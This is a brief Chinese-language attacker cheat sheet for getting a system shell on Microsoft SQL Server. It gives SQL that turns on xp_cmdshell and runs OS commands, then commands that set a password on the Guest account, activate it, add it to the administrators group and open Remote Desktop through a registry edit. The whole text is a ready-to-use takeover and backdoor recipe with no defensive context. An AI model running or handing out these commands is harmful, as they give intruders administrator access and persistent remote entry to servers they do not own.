sqlserver 拿shell命令

execute('sp_configure "show advanced options",1')  #将该选项的值设置为1

execute('reconfigure')                             #保存设置

execute('sp_configure "xp_cmdshell", 1')           #将xp_cmdshell的值设置为1

execute('reconfigure')                             #保存设置

execute('sp_configure')                            #查看配置

execute('xp_cmdshell "whoami"')                    #执行系统命令

 

或者

exec sp_configure 'show advanced options',1;        

reconfigure;                                        

exec sp_configure 'xp_cmdshell',1;                  

reconfigure;                                      

exec sp_configure;                                  

exec xp_cmdshell 'whoami';                          

 

 

可以执行系统权限之后,前提是获取的主机权限是administrators组里的

exec xp_cmdshell 'net user Guest 123456'              #给guest用户设置密码

exec xp_cmdshell 'net user Guest /active:yes'         #激活guest用户

exec xp_cmdshell 'net localgroup administrators Guest /add'  #将guest用户添加到administrators用户组

exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'        #开启3389端口